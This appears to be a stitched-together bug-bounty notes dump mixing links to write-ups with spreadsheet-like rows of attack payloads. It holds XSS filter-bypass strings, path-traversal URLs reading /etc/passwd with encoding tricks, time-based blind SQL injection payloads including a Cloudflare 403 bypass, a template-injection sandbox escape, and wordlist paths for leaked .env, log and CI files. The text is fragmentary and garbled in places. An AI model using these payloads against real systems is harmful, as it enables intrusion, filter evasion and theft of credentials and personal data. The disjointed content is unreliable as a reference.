https://freedium-mirror.cfd/en/https://medium.com/@Rahul.Masal/how-i-found-an-exposed-prometheus-metrics-endpoint-and-earned-5-000-in-bug-bounty-f2f72a5766c2


WEB-INF/web.xm

REGEX BYPASS 

<​sCrIpT>alert(XSS)<​/sCriPt> 
hashtag#changing the case of the tag

<<​script>alert(XSS)<​/script> 
hashtag#prepending an additional "<"

<​script>alert(XSS) // 
hashtag#removing the closing tag

<​script>alert`XSS`<​/script> 
hashtag#using backticks instead of parenetheses

java%0ascript:alert(1) 
hashtag#using encoded newline characters

<iframe src=http://malicous.com < 
hashtag#double open angle brackets

<​STYLE>.classname{background-image:url("javascript​:alert(XSS)");}<​/STYLE> 
hashtag#uncommon tags

<img/src=1/onerror​=alert(0)> 
hashtag#bypass space filter by using / where a space is expected

<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript​:alert(1)>xss</a> 
hashtag#extra characters

Function("ale"+"rt(1)")(); 
hashtag#using uncommon functions besides alert, console.log, and prompt

javascript​:74163166147401571561541571411447514115414516216450615176 
hashtag#octal encoding

<iframe src="javascript​:alert(`xss`)"> 
hashtag#unicode encoding

/?id=1+un/**/ion+sel/**/ect+1,2,3-- 
hashtag#using comments in SQL query to break up statement

new Function`alt\`6\``; 
hashtag#using backticks instead of parentheses

data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ 
hashtag#base64 encoding the javascript

%26%2397;lert(1) 
hashtag#using HTML encoding

<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> 
hashtag#Using Line Feed (LF) line breaks 

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> 
-----------------

https://readmedium.com/en/lfi-advanced-methodology-by-abhijeet-6663bede44c6

ASWIN K V | deepmarketer

Path Traversal

Bypass Filters
If basic attempts fail, try evasion techniques:

1.URL Encoding:
https://target.com/download?file=..%2F..%2Fetc%2Fpasswd

2.Double Encoding:
https://target.com/download?file=%252E%252E%252F%252E%252E%252Fetc%2Fpasswd

3.Unicode:
https://target.com/download?file=..\u2215..\u2215etc\u2215passwd (if Unicode normalization is mishandled).

4.Null Byte (older systems):
https://target.com/download?file=../../../etc/passwd%00.txt

5.Relative Paths with Junk:
https://target.com/download?file=/valid/path/../../../../etc/passwd
-----------------


57	directory traversal	Payload: /****/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd	https://github.com/ifconfig-me/Directory-Traversal-Payloads/blob/main/payloads.txt														



51	Sensitive data leakage in the get notified option	https://medium.com/@bughunt789/sensitive-information-disclosure-critical-finding-8fcbd7fe1704		Add the folder 'home/000~ROOT~000/' to your wordlist, and you might discover some juicy data. Enjoy!"	app/config/config.local.neon	"Found 10 mbs log file leaking sqli erros and 60k lines debug info 
add this to your wordlist if application is using laraval framework
/storage/logs/laravel.log"	"Using Subfinder:
I ran the following command to find all subdomains for the target domain, in this case, radicate.com, and saved the output to a file called subdomain.txt:

subfinder -d radicate.com -all -recursive -o subdomain.txt

Filtering for Admin Panels:
To narrow down my search for admin panels, I filtered the results for subdomains containing the word “admin”:

cat subdomain.txt | grep “admin”

Alternatively, you can combine both steps in one command, without saving to a file:

subfinder -d radicate.com -all -recursive | grep “admin”"	/.vscode/sftp.json	/api/.env	env/config.js 	EndPoint : https://sub[.]domain[.]com/.config.inc.php.swp						



29	Time based SQLI	https://medium.com/@kshunya/how-i-got-time-based-sql-injection-in-an-old-public-bug-bounty-program-f6260cd4e75e	https://cyb3rmind.medium.com/2-bug-bounty-poc-time-based-sql-injection-to-dump-database-f8cfa089f393	https://cyb3rmind.medium.com/4-bug-bounty-series-exploiting-boolean-based-sql-injection-3455d800892e	https://medium.com/@kshunya/how-i-got-time-based-sql-injection-in-an-old-public-bug-bounty-program-f6260cd4e75e	https://marxchryz.medium.com/my-bug-bounty-journey-and-my-first-critical-bug-time-based-blind-sql-injection-aa91d8276e41	"Cloudflare 403 bypass to time-based blind SQLi:

PL: (select(0)from(select(sleep(10)))v) → 403
but PL: (select(0)from(select(sleep(6)))v)/*'%2B(select(0)from(select(sleep(6)))v)%2B'%5C""%2B(select(0)from(select(sleep(6)))v) → Time-based Blind SQLi  ; https://media.licdn.com/dms/image/v2/D5622AQFS-xcOY8_I2g/feedshare-shrink_800/B56ZdscvlkGQAo-/0/1749871164925?e=1753920000&v=beta&t=zPsg6PvzIqsivB7-NEqZWe4RefsIYkxgSJIkfdIEhos"	"0'XOR(if(now()=sysdate(),sleep(5),0))XOR'Z 
0'XOR(if (now()=sysdate(),sleep(5*1),0))XOR'Z
if(now()=sysdate(), sleep(5),0)
'XOR(if(now()=sysdate(), sleep(5),0))XOR'
'XOR(if (now()=sysdate(), sleep(5*1),0))OR'"	https://medium.com/@anonymousshetty2003/sql-injection-in-hidden-contact-form-parameter-660bd1281491								


"SQL Tips
I Found SQL Blind in User-Agent

Payload : %22)%20AND%201337%3dBENCHMARK(5000000,MD5(0x774c5341))%20AND%20(%221337%22%20LIKE%20%221337"


https://medium.com/@mrcix/sensitive-data-exposure-in-a-moodle-config-file-648ca3d54676
https://medium.com/@Zeroo_sec/how-i-accessed-an-admin-panel-without-touching-the-keyboard-43ad45a06f8d
Add this file to your wordlist `.gitlab-ci.yml` , enjoy its contain a database username and password.
"PII Data Exposure of Hundreds of Users Including , Name , Email , Vehicle Number , CNIC Number, Password Hashes Etc 

Endpoint:example[.]com/storage/logs/Laravel.log"	/export/inc/config.inc


https://buer.haus/2015/01/15/yahoo-root-access-sql-injection-tw-yahoo-com/
https://medium.com/@zomasec/how-i-found-22-lfi-in-the-same-program-using-automation-tricks-3ea303d24f4a

Template Injection
18	Template Injection	xss payload: {{'a'.constructor.prototype.charAt=''.valueOf;$eval("x='\"+(y='if(!window\\u002ex)alert(window\\u002ex=1)')+eval(y)+\"'");}}			"Bug : CSTI 
Context : well I got https://shivang .com/forms/forgot-password?email={{7*7}} just entered 7*7 checked in inspect element got 49 reported it. Got 100$"				

target.com/config.js
target.com/db.js

